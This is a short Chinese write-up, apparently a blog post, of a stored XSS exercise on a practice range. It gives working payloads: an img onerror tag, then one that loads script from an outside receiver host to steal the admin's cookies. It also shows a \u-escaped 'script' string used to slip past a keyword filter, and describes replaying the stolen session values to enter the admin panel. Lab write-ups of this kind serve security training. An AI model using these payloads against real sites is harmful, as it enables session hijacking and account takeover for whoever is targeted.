安鸾靶场XSS挖掘&绕过

传统方法试一下,发现scirp标签被过滤掉了

<script>alert("xss");</script>

直接换一种标签接着测肯能不能弹窗

<img src=1 οnerrοr=alert("xss");>

使用<img>标签时弹窗了,说明没有对img标签进行过滤

自己构造一个img标签的js代码,让管理员带着cookie来见我

<img src=x οnerrοr=s=createElement('script');body.appendChild(s);s.src='http://vpn.whalwl.work:18080/5GlYEi?1690861593';>

 

没注意到上面的语句还有一个'scirp',导致被过滤,js语法错误

重新构造,给scirp转码绕过

<img src=x οnerrοr=s=createElement('\u0073\u0063\u0072\u0069\u0070\u0074');body.appendChild(s);s.src='http://vpn.whalwl.work:18080/5GlYEi?1690861593';>

 

 

绕过成功了  

 

发现有三个必要参数,cookie,roc_login,roc_secure

把这三个弄到小饼干上,盲猜一波管理员网站的地址是admin,http://106.15.50.112:8013/admin

回车